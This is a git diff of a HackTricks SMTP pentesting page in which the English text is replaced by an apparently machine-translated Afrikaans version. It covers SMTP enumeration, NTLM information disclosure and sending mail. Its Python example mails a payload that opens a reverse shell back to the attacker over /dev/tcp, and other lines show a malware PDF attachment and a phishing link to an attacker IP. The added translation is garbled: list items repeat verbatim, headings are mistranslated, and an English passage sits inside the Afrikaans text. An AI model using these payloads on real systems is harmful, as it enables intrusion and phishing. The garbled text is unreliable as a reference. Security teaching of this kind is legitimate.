-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Werk jy in 'n **cybersekuriteitsmaatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 

diff --git a/network-services-pentesting/pentesting-smtp/README.md b/network-services-pentesting/pentesting-smtp/README.md
index 82d74ae4d..4badcc9f7 100644
--- a/network-services-pentesting/pentesting-smtp/README.md
+++ b/network-services-pentesting/pentesting-smtp/README.md
@@ -2,100 +2,144 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
 

 
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
+**Onmiddellik beskikbare opset vir kwesbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige pentest uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, skulpe te kraak en pret te hê.
 
 {% embed url="https://pentest-tools.com/" %}
 
-## **Basic Information**
+## **Basiese Inligting**
 
-The **Simple Mail Transfer Protocol (SMTP)** is a protocol utilized within the TCP/IP suite for the **sending and receiving of e-mail**. Due to its limitations in queuing messages at the recipient's end, SMTP is often employed alongside either **POP3 or IMAP**. These additional protocols enable users to store messages on a server mailbox and to periodically download them.
+Die **Simple Mail Transfer Protocol (SMTP)** is 'n protokol wat binne die TCP/IP-suite gebruik word vir die **stuur en ontvang van e-pos**. As gevolg van sy beperkings in die toustaan van boodskappe aan die ontvanger se kant, word SMTP dikwels saam met **POP3 of IMAP** gebruik. Hierdie bykomende protokolle maak dit vir gebruikers moontlik om boodskappe op 'n bedienerposbus te stoor en dit periodiek af te laai.
 
-In practice, it is common for **e-mail programs** to employ **SMTP for sending e-mails**, while utilizing **POP3 or IMAP for receiving** them. On systems based on Unix, **sendmail** stands out as the SMTP server most frequently used for e-mail purposes. The commercial package known as Sendmail encompasses a POP3 server. Furthermore, **Microsoft Exchange** provides an SMTP server and offers the option to include POP3 support.
-
-**Default port:** 25,465(ssl),587(ssl)
+In die praktyk is dit algemeen vir **e-posprogramme** om **SMTP te gebruik vir die stuur van e-posse**, terwyl hulle **POP3 of IMAP gebruik om dit te ontvang**. Op Unix-gebaseerde stelsels staan **sendmail** uit as die mees gebruikte SMTP-bedieners vir e-posdoeleindes. Die kommersiële pakket bekend as Sendmail sluit 'n POP3-bediener in. Verder bied **Microsoft Exchange** 'n SMTP-bediener en bied die opsie om POP3-ondersteuning in te sluit.
 
+**Verstekpoort:** 25,465(ssl),587(ssl)
 ```
 PORT   STATE SERVICE REASON  VERSION
 25/tcp open  smtp    syn-ack Microsoft ESMTP 6.0.3790.3959
 ```
+### EPOS-Opstellers
 
-### EMAIL Headers
+As jy die geleentheid het om die slagoffer 'n e-pos te laat stuur (byvoorbeeld deur die kontakvorm van die webblad te gebruik), doen dit omdat jy sodoende die interne topologie van die slagoffer kan leer deur na die opstellers van die e-pos te kyk.
 
-If you have the opportunity to **make the victim send you a email** (via contact form of the web page for example), do it because **you could learn about the internal topology** of the victim seeing the headers of the mail.
+Jy kan ook 'n e-pos kry van 'n SMTP-bediener deur te probeer om 'n e-pos na daardie bediener te stuur met 'n nie-bestaande adres (omdat die bediener 'n NDN-e-pos aan die aanvaller sal stuur). Maar, maak seker dat jy die e-pos van 'n toegelate adres stuur (kontroleer die SPF-beleid) en dat jy NDN-boodskappe kan ontvang.
 
-You can also get an email from a SMTP server trying to **send to that server an email to a non-existent address** (because the server will send to the attacker a NDN mail). But, be sure that you send the email from an allowed address (check the SPF policy) and that you can receive NDN messages.
+Jy moet ook probeer om verskillende inhoud te stuur omdat jy meer interessante inligting in die opstellers kan vind, soos: `X-Virus-Scanned: by av.domain.com`\
+Jy moet die EICAR-toetslêer stuur.\
+Die opsporing van die **AV** kan jou in staat stel om bekende kwesbaarhede uit te buit.
 
-You should also try to **send different contents because you can find more interesting information** on the headers like: `X-Virus-Scanned: by av.domain.com`\
-You should send the EICAR test file.\
-Detecting the **AV** may allow you to exploit **known vulnerabilities.**
+## Basiese aksies
 
-## Basic actions
-
-### **Banner Grabbing/Basic connection**
+### **Opstellers gryp/Basiese verbinding**
 
 **SMTP:**
-
 ```bash
 nc -vn  25
 ```
-
 **SMTPS**:
 
+SMTPS (Secure SMTP) is 'n beveiligde weergawe van die Simple Mail Transfer Protocol (SMTP) wat gebruik word om e-posse te stuur en te ontvang. Dit maak gebruik van SSL- of TLS-versleuteling om die kommunikasie tussen die e-poskliënt en die e-posbediener te beveilig. Hierdie beveiligingslaag verseker dat die e-posse veilig oorgedra word en beskerm teen afluistering en manipulasie deur aanvallers. Om toegang te verkry tot 'n SMTPS-bedienaar, moet jy 'n geldige sertifikaat hê wat deur die bediener vertrou word.
 ```bash
 openssl s_client -crlf -connect smtp.mailgun.org:465 #SSL/TLS without starttls command
 openssl s_client -starttls smtp -crlf -connect smtp.mailgun.org:587
 ```
+### Vind MX-bedieners van 'n organisasie
 
-### Finding MX servers of an organisation
+Om die MX-bedieners van 'n organisasie te vind, kan jy die volgende stappe volg:
 
+1. Gebruik 'n DNS-navraaghulpmiddel soos `nslookup` of `dig` om die DNS-rekords van die organisasie se domein te ondersoek. Byvoorbeeld:
+
+   ```bash
+   nslookup -type=MX example.com
+   ```
+
+   Hierdie opdrag sal die MX-rekords vir die domein `example.com` toon.
+
+2. Kyk vir die resultate van die navraag en identifiseer die MX-bedieners. Die MX-bedieners is die rekords wat begin met die voorvoegsel `MX` en 'n prioriteitstoekenning het. Byvoorbeeld:
+
+   ```plaintext
+   example.com       MX preference = 10, mail exchanger = mx1.example.com
+   example.com       MX preference = 20, mail exchanger = mx2.example.com
+   ```
+
+   In hierdie geval is `mx1.example.com` en `mx2.example.com` die MX-bedieners van die organisasie.
+
+Deur hierdie stappe te volg, sal jy in staat wees om die MX-bedieners van 'n organisasie te vind. Hierdie inligting kan nuttig wees vir SMTP-pentesting en ander netwerktoetse.
 ```bash
 dig +short mx google.com
 ```
+### Opstel
 
-### Enumeration
+Enumeration is 'n proses waardeur 'n aanvaller inligting versamel oor 'n SMTP-diens om potensiële aanvalspunte te identifiseer. Hier is 'n paar tegnieke wat gebruik kan word vir enumeration:
 
+- **SMTP Banner Grabbing**: Hierdie tegniek behels die verbind met die SMTP-diens en die ondersoek van die banner wat deur die diens teruggestuur word. Die banner kan inligting bevat soos die diens se weergawe en die gebruikte sagteware.
+
+- **User Enumeration**: Hierdie tegniek behels die identifisering van geldige gebruikers op die SMTP-diens. Dit kan gedoen word deur verskillende gebruikersname te probeer en te kyk vir spesifieke foutboodskappe wat aandui of 'n gebruiker geldig is of nie.
+
+- **Email Address Enumeration**: Hierdie tegniek behels die identifisering van geldige e-posadresse op die SMTP-diens. Dit kan gedoen word deur verskillende e-posadresse te probeer en te kyk vir spesifieke foutboodskappe wat aandui of 'n e-posadres geldig is of nie.
+
+- **SMTP VRFY-enumerasie**: Hierdie tegniek behels die gebruik van die SMTP VRFY-opdrag om te bevestig of 'n spesifieke gebruiker of e-posadres geldig is op die diens.
+
+- **SMTP RCPT-enumerasie**: Hierdie tegniek behels die gebruik van die SMTP RCPT-opdrag om te bevestig of 'n spesifieke e-posadres geldig is op die diens.
+
+- **SMTP EXPN-enumerasie**: Hierdie tegniek behels die gebruik van die SMTP EXPN-opdrag om die volledige e-posadres van 'n spesifieke gebruiker te verkry.
+
+- **SMTP Relay-enumerasie**: Hierdie tegniek behels die identifisering van SMTP-relay-stelsels wat gebruik kan word om e-posse te stuur sonder die nodige outentifikasie.
+
+- **SMTP User-Agent-enumerasie**: Hierdie tegniek behels die identifisering van die gebruikte e-poskliënt of -agtent deur die SMTP-diens.
+
+- **SMTP Extension-enumerasie**: Hierdie tegniek behels die identifisering van enige uitbreidings wat deur die SMTP-diens ondersteun word.
+
+- **SMTP Service-enumerasie**: Hierdie tegniek behels die identifisering van ander dienste wat op dieselfde bediener as die SMTP-diens uitgevoer word.
+
+- **SMTP Verbindings-enumerasie**: Hierdie tegniek behels die identifisering van die maksimum aantal toegelate verbindings na die SMTP-diens.
+
+- **SMTP Relay-enumerasie**: Hierdie tegniek behels die identifisering van SMTP-relay-stelsels wat gebruik kan word om e-posse te stuur sonder die nodige outentifikasie.
+
+- **SMTP User-Agent-enumerasie**: Hierdie tegniek behels die identifisering van die gebruikte e-poskliënt of -agtent deur die SMTP-diens.
+
+- **SMTP Extension-enumerasie**: Hierdie tegniek behels die identifisering van enige uitbreidings wat deur die SMTP-diens ondersteun word.
+
+- **SMTP Service-enumerasie**: Hierdie tegniek behels die identifisering van ander dienste wat op dieselfde bediener as die SMTP-diens uitgevoer word.
+
+- **SMTP Verbindings-enumerasie**: Hierdie tegniek behels die identifisering van die maksimum aantal toegelate verbindings na die SMTP-diens.
 ```bash
 nmap -p25 --script smtp-commands 10.10.10.10
 nmap -p25 --script smtp-open-relay 10.10.10.10 -v
 ```
+### NTLM Auth - Inligtingsoffergawe
 
-### NTLM Auth - Information disclosure
-
-If the server supports NTLM auth (Windows) you can obtain sensitive info (versions). More info [**here**](https://medium.com/@m8r0wn/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666).
-
+As die bediener NTLM-verifikasie ondersteun (Windows), kan jy sensitiewe inligting (weergawes) verkry. Meer inligting [**hier**](https://medium.com/@m8r0wn/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666).
 ```bash
-root@kali: telnet example.com 587 
-220 example.com SMTP Server Banner 
->> HELO 
-250 example.com Hello [x.x.x.x] 
->> AUTH NTLM 334 
-NTLM supported 
->> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= 
+root@kali: telnet example.com 587
+220 example.com SMTP Server Banner
+>> HELO
+250 example.com Hello [x.x.x.x]
+>> AUTH NTLM 334
+NTLM supported
+>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
 334 TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA
 ```
+Of **outomatiseer** dit met die **nmap** invoegtoepassing `smtp-ntlm-info.nse`
 
-Or **automate** this with **nmap** plugin `smtp-ntlm-info.nse`
-
-### Internal server name - Information disclosure
-
-Some SMTP servers auto-complete a sender's address when command "MAIL FROM" is issued without a full address, disclosing its internal name:
+### Interne bedienernaam - Inligtingsoopmaking
 
+Sommige SMTP-bedieners voltooi outomaties 'n afsender se adres wanneer die opdrag "MAIL FROM" uitgereik word sonder 'n volledige adres, wat die interne naam daarvan openbaar maak:
 ```
-220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at  Wed, 15 Sep 2021 12:13:28 +0200 
+220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at  Wed, 15 Sep 2021 12:13:28 +0200
 EHLO all
 250-somedomain.com Hello [x.x.x.x]
 250-TURN
@@ -112,19 +156,17 @@ EHLO all
 MAIL FROM: me
 250 2.1.0 me@PRODSERV01.somedomain.com....Sender OK
 ```
-
 ### Sniffing
 
-Check if you sniff some password from the packets to port 25
+Kyk of jy 'n wagwoord kan snuif van die pakkies na poort 25.
 
 ### [Auth bruteforce](../../generic-methodologies-and-resources/brute-force.md#smtp)
 
-## Username Bruteforce Enumeration
+## Gebruikersnaam Bruteforce Enumerasie
 
-**Authentication is not always needed**
+**Verifikasie is nie altyd nodig nie**
 
 ### RCPT TO
-
 ```bash
 $ telnet 1.1.1.1 25
 Trying 1.1.1.1...
@@ -142,9 +184,25 @@ RCPT TO:admin
 RCPT TO:ed
 250 2.1.5 ed... Recipient ok
 ```
-
 ### VRFY
 
+VRFY (VeriFy) is a command used in the Simple Mail Transfer Protocol (SMTP) to verify the existence of a specific email address. It is commonly used by email servers to check if an email address is valid before accepting incoming messages.
+
+When the VRFY command is sent to an SMTP server, the server will respond with one of the following:
+
+- 250 OK: This means that the email address exists and is valid.
+- 550 No such user: This means that the email address does not exist or is not valid.
+
+VRFY can be useful during the reconnaissance phase of a penetration test, as it allows the tester to gather information about valid email addresses on a target system. However, it is important to note that some SMTP servers may be configured to disable the VRFY command due to security concerns.
+
+To use the VRFY command, you can use a telnet client to connect to the SMTP server on port 25 and then issue the VRFY command followed by the email address you want to verify. For example:
+
+```
+telnet mail.example.com 25
+VRFY john.doe@example.com
+```
+
+The server's response will indicate whether the email address is valid or not.
 ```bash
 $ telnet 1.1.1.1 25
 Trying 1.1.1.1...
@@ -160,9 +218,17 @@ VRFY root
 VRFY blah
 550 blah... User unknown
 ```
-
 ### EXPN
 
+Die EXPN-opdrag word gebruik om die volledige e-posadres van 'n ontvanger te verkry deur die e-posadresuitbreiding van 'n gebruiker te onthul. Dit kan nuttig wees vir 'n aanvaller om 'n lys geldige e-posadresuitbreidings te verkry vir doeleindes soos sosiale ingenieurswese of spamverspreiding.
+
+Om die EXPN-opdrag uit te voer, kan jy die volgende stappe volg:
+
+1. Verbind met die SMTP-bediener deur die relevante poort (gewoonlik poort 25) te gebruik.
+2. Stuur die opdrag `EXPN ` na die bediener, waar `` die e-posadresuitbreiding is wat jy wil onthul.
+3. Ontvang die reaksie van die bediener. As die uitbreiding geldig is, sal die bediener die volledige e-posadres terugstuur. As die uitbreiding nie geldig is nie, sal die bediener 'n foutboodskap terugstuur.
+
+Dit is belangrik om te onthou dat nie alle SMTP-bedieners die EXPN-opdrag ondersteun nie, en dit kan deur die bediener gedeaktiveer word vir sekuriteitsredes.
 ```bash
 $ telnet 1.1.1.1 25
 Trying 1.1.1.1...
@@ -179,45 +245,92 @@ EXPN root
 EXPN sshd
 250 2.1.5 sshd privsep sshd@myhost
 ```
+### Outomatiese gereedskap
 
-### Automatic tools
+Daar is verskeie outomatiese gereedskap beskikbaar vir SMTP-pentesting wat jou kan help om vinnig en doeltreffend te skandeer vir sekuriteitskwessies en swakheid in 'n SMTP-diens. Hier is 'n paar van die gewildste outomatiese gereedskap wat jy kan gebruik:
 
+- **Nmap**: 'n Veelsydige skanderingstool wat ook SMTP-dienste kan skandeer en sekuriteitskwessies kan identifiseer.
+- **Metasploit**: 'n Kragtige raamwerk vir penetrasietoetse wat 'n verskeidenheid modules bevat vir SMTP-pentesting.
+- **OpenVAS**: 'n Open Source-vulnerabiliteitsbeoordelingstool wat ook SMTP-dienste kan skandeer vir swakheid.
+- **SMTP User Enum**: 'n Gereedskap wat gebruik kan word om geldige gebruikersname in 'n SMTP-diens te identifiseer deur middel van 'n gebruikersnaamopsoek.
+- **SMTPTester**: 'n Eenvoudige gereedskap wat SMTP-dienste kan skandeer en toets vir swakheid soos oop relays en ongeldige gebruikersname.
+
+Dit is belangrik om te onthou dat outomatiese gereedskap slegs 'n hulpmiddel is en nie al die moontlike swakheid en sekuriteitskwessies kan opspoor nie. Dit is altyd 'n goeie praktyk om handmatige pentesting-tegnieke te gebruik om 'n volledige beeld van die sekuriteit van 'n SMTP-diens te verkry.
 ```
 Metasploit: auxiliary/scanner/smtp/smtp_enum
 smtp-user-enum: smtp-user-enum -M  -u  -t 
 Nmap: nmap --script smtp-enum-users 
 ```
-
 

 
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
+**Onmiddellik beskikbare opset vir kwesbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige penetrasietoets uit van enige plek met 20+ gereedskap en funksies wat strek van verkenningswerk tot verslagdoening. Ons vervang nie penetrasietoetsers nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, skulpe te kraak en pret te hê.
 
 {% embed url="https://pentest-tools.com/" %}
 
-## DSN Reports
+## DSN-rapporte
 
-**Delivery Status Notification Reports**: If you send an **email** to an organisation to an **invalid address**, the organisation will notify that the address was invalided sending a **mail back to you**. **Headers** of the returned email will **contain** possible **sensitive information** (like IP address of the mail services that interacted with the reports or anti-virus software info).
+**Afleweringsstatuskennisgewingsrapporte**: As jy 'n **e-pos** na 'n organisasie stuur na 'n **ongeldige adres**, sal die organisasie jou in kennis stel dat die adres ongeldig was deur 'n **e-pos terug te stuur**. **Koppe** van die teruggestuurde e-pos sal moontlike **sensitiewe inligting** bevat (soos IP-adres van die e-posdienste wat met die rapporte geïnteraksie het of inligting oor antivirus sagteware).
 
-## [Commands](smtp-commands.md)
-
-### Sending an Email from linux console
+## [Opdragte](smtp-commands.md)
 
+### Stuur 'n e-pos vanaf die Linux-konsole
 ```bash
 sendEmail -t to@domain.com -f from@attacker.com -s  -u "Important subject" -a /tmp/malware.pdf
 Reading message body from STDIN because the '-m' option was not used.
 If you are manually typing in a message:
-  - First line must be received within 60 seconds.
-  - End manual input with a CTRL-D on its own line.
+- First line must be received within 60 seconds.
+- End manual input with a CTRL-D on its own line.
 
 
 ```
 
 ```bash
- swaks --to $(cat emails | tr '\n' ',' | less) --from test@sneakymailer.htb --header "Subject: test" --body "please click here http://10.10.14.42/" --server 10.10.10.197
+swaks --to $(cat emails | tr '\n' ',' | less) --from test@sneakymailer.htb --header "Subject: test" --body "please click here http://10.10.14.42/" --server 10.10.10.197
+```
+### Stuur 'n E-pos met Python
+
+Om 'n e-pos te stuur met Python, kan jy die `smtplib`-biblioteek gebruik. Hier is 'n voorbeeld van hoe om dit te doen:
+
+```python
+import smtplib
+
+def send_email(sender_email, sender_password, receiver_email, subject, message):
+    try:
+        # Verbind met die SMTP-bediener
+        server = smtplib.SMTP('smtp.gmail.com', 587)
+        server.starttls()
+        server.login(sender_email, sender_password)
+
+        # Stel die e-pos op
+        email_message = f"Subject: {subject}\n\n{message}"
+
+        # Stuur die e-pos
+        server.sendmail(sender_email, receiver_email, email_message)
+        print("E-pos suksesvol gestuur!")
+    except Exception as e:
+        print(f"Fout tydens die stuur van die e-pos: {str(e)}")
+    finally:
+        # Sluit die verbinding met die SMTP-bediener
+        server.quit()
+
+# Stel die nodige inligting op
+sender_email = "jou@gmail.com"
+sender_password = "jouwagwoord"
+receiver_email = "ontvanger@gmail.com"
+subject = "Hallo daar!"
+message = "Hierdie is 'n toetsboodskap."
+
+# Stuur die e-pos
+send_email(sender_email, sender_password, receiver_email, subject, message)
 ```
 
-### Sending an Email with Python
+Sorg dat jy die volgende veranderinge maak aan die kode:
+- Vervang `jou@gmail.com` met jou e-posadres.
+- Vervang `jouwagwoord` met jou e-pos wagwoord.
+- Vervang `ontvanger@gmail.com` met die e-posadres van die ontvanger.
+- Pas die onderwerp en boodskap aan soos nodig.
 
+Hierdie kode sal 'n e-pos stuur vanaf jou Gmail-rekening na die ontvanger se e-posadres.
 ```python
 from email.mime.multipart import MIMEMultipart
 from email.mime.text import MIMEText
@@ -233,12 +346,12 @@ rport = 25 # 489,587
 msg = MIMEMultipart()
 
 # setup the parameters of the message
-password = "" 
+password = ""
 msg['From'] = "attacker@local"
 msg['To'] = "victim@local"
 msg['Subject'] = "This is not a drill!"
 
-# payload 
+# payload
 message = ("& /dev/tcp/%s/%d 0>&1'); ?>" % (lhost,lport))
 
 print("[*] Payload is generated : %s" % message)
@@ -247,8 +360,8 @@ msg.attach(MIMEText(message, 'plain'))
 server = smtplib.SMTP(host=rhost,port=rport)
 
 if server.noop()[0] != 250:
-    print("[-]Connection Error")
-    exit()
+print("[-]Connection Error")
+exit()
 
 server.starttls()
 
@@ -260,52 +373,50 @@ server.quit()
 
 print("[***]successfully sent email to %s:" % (msg['To']))
 ```
+## E-posvervalsing Teenmaatreëls
 
-## Mail Spoofing Countermeasures
+Organisasies word verhoed om ongemagtigde e-posse namens hulle te stuur deur gebruik te maak van **SPF**, **DKIM**, en **DMARC** as gevolg van die maklikheid van e-posvervalsing.
 
-Organizations are prevented from having unauthorized email sent on their behalf by employing **SPF**, **DKIM**, and **DMARC** due to the ease of spoofing SMTP messages.
-
-A **complete guide to these countermeasures** is made available at [https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/).
+'n **Volledige gids oor hierdie teenmaatreëls** is beskikbaar by [https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/).
 
 ### SPF
 
 {% hint style="danger" %}
-SPF [was "deprecated" in 2014](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/). This means that instead of creating a **TXT record** in `_spf.domain.com` you create it in `domain.com` using the **same syntax**.\
-Moreover, to reuse previous spf records it's quiet common to find something like `"v=spf1 include:_spf.google.com ~all"`
+SPF [is in 2014 "verouderd" geraak](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/). Dit beteken dat jy in plaas van 'n **TXT-rekord** in `_spf.domain.com` 'n rekord in `domain.com` moet skep met dieselfde sintaksis.\
+Verder is dit baie algemeen om iets soos `"v=spf1 include:_spf.google.com ~all"` te vind om vorige SPF-rekords te hergebruik.
 {% endhint %}
 
-**Sender Policy Framework** (SPF) is a mechanism that enables Mail Transfer Agents (MTAs) to verify whether a host sending an email is authorized by querying a list of authorized mail servers defined by the organizations. This list, which specifies IP addresses/ranges, domains, and other entities **authorized to send email on behalf of a domain name**, includes various "**Mechanisms**" in the SPF record.
+**Sender Policy Framework** (SPF) is 'n meganisme wat Mail Transfer Agents (MTAs) in staat stel om te verifieer of 'n gasheer wat 'n e-pos stuur, gemagtig is deur 'n lys van gemagtigde posdiensverskaffers te ondervra wat deur die organisasies gedefinieer is. Hierdie lys, wat IP-adresse/reekse, domeine en ander entiteite insluit wat **gemagtig is om e-pos namens 'n domeinnaam te stuur**, bevat verskillende "**Meganismes**" in die SPF-rekord.
 
-#### Mechanisms
+#### Meganismes
 
-From [Wikipedia](https://en.wikipedia.org/wiki/Sender_Policy_Framework):
+Vanaf [Wikipedia](https://en.wikipedia.org/wiki/Sender_Policy_Framework):
 
-| Mechanism | Description                                                                                                                                                                                                                                                                                                                         |
+| Meganisme | Beskrywing                                                                                                                                                                                                                                                                                                                          |
 | --------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
-| ALL       | Matches always; used for a default result like `-all` for all IPs not matched by prior mechanisms.                                                                                                                                                                                                                                  |
-| A         | If the domain name has an address record (A or AAAA) that can be resolved to the sender's address, it will match.                                                                                                                                                                                                                   |
-| IP4       | If the sender is in a given IPv4 address range, match.                                                                                                                                                                                                                                                                              |
-| IP6       | If the sender is in a given IPv6 address range, match.                                                                                                                                                                                                                                                                              |
-| MX        | If the domain name has an MX record resolving to the sender's address, it will match (i.e. the mail comes from one of the domain's incoming mail servers).                                                                                                                                                                          |
-| PTR       | If the domain name (PTR record) for the client's address is in the given domain and that domain name resolves to the client's address (forward-confirmed reverse DNS), match. This mechanism is discouraged and should be avoided, if possible.                                                                                     |
-| EXISTS    | If the given domain name resolves to any address, match (no matter the address it resolves to). This is rarely used. Along with the SPF macro language it offers more complex matches like DNSBL-queries.                                                                                                                           |
-| INCLUDE   | References the policy of another domain. If that domain's policy passes, this mechanism passes. However, if the included policy fails, processing continues. To fully delegate to another domain's policy, the redirect extension must be used.                                                                                     |
-| REDIRECT  | 
A redirect is a pointer to another domain name that hosts an SPF policy, it allows for multiple domains to share the same SPF policy. It is useful when working with a large amount of domains that share the same email infrastructure.
It SPF policy of the domain indicated in the redirect Mechanism will be used.
 |
+| ALL       | Pas altyd; gebruik vir 'n verstekresultaat soos `-all` vir alle IP-adresse wat nie deur vorige meganismes gekoppel is nie.                                                                                                                                                                                                           |
+| A         | As die domeinnaam 'n adresrekord (A of AAAA) het wat opgelos kan word na die afstuurder se adres, sal dit pas.                                                                                                                                                                                                                      |
+| IP4       | As die afstuurder binne 'n gegewe IPv4-adresreekse is, pas dit.                                                                                                                                                                                                                                                                     |
+| IP6       | As die afstuurder binne 'n gegewe IPv6-adresreekse is, pas dit.                                                                                                                                                                                                                                                                     |
+| MX        | As die domeinnaam 'n MX-rekord het wat oplos na die afstuurder se adres, sal dit pas (m.a.w. die pos kom van een van die domein se inkomende posdiensverskaffers).                                                                                                                                                                  |
+| PTR       | As die domeinnaam (PTR-rekord) vir die kliënt se adres binne die gegewe domein is en daardie domeinnaam oplos na die kliënt se adres (forward-confirmed reverse DNS), pas dit. Hierdie meganisme word afgeraai en moet vermy word, indien moontlik.                                                                                     |
+| EXISTS    | As die gegewe domeinnaam oplos na enige adres, pas dit (maak nie saak na watter adres dit oplos nie). Dit word selde gebruik. Tesame met die SPF-makrotaal bied dit meer komplekse pasmaats soos DNSBL-navrae.                                                                                                                           |
+| INCLUDE   | Verwys na die beleid van 'n ander domein. As daardie domein se beleid slaag, slaag hierdie meganisme. As die ingeslote beleid egter misluk, gaan die verwerking voort. Om volledig te delegeer na 'n ander domein se beleid, moet die omskakelingsextensie gebruik word.                                                                         |
+| REDIRECT  | 
Die SPF-beleid van die domein wat in die omskakelingsmeganisme aangedui word, sal gebruik word.
 |
 
-It's also possible to identify **Qualifiers** that indicates **what should be done if a mechanism is matched**. By default, the **qualifier "+"** is used (so if any mechanism is matched, that means it's allowed).\
-You usually will note **at the end of each SPF policy** something like: **\~all** or **-all**. This is used to indicate that **if the sender doesn't match any SPF policy, you should tag the email as untrusted (\~) or reject (-) the email.**
+Dit is ook moontlik om **Kwalifiseerders** te identifiseer wat aandui **wat gedoen moet word as 'n meganisme ooreenstem**. Standaard word die **kwalifiseerder "+"** gebruik (so as enige meganisme ooreenstem, beteken dit dat dit toegelaat word).\
+Gewoonlik sal jy **aan die einde van elke SPF-beleid** iets soos **\~all** of **-all** sien. Dit word gebruik om aan te dui dat **as die afstuurder nie ooreenstem met enige SPF-beleid nie, jy die e-pos as onbetroubaar (\~) moet merk of die e-pos moet verwerp (-).**
 
-#### Qualifiers
+#### Kwalifiseerders
